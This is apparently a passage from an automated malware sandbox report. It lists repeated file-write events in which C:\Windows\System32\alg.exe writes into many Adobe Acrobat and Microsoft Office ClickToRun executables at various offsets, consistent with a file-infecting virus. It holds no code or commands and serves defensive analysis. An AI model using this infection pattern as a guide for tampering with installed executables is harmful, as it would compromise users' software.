Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0 Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680
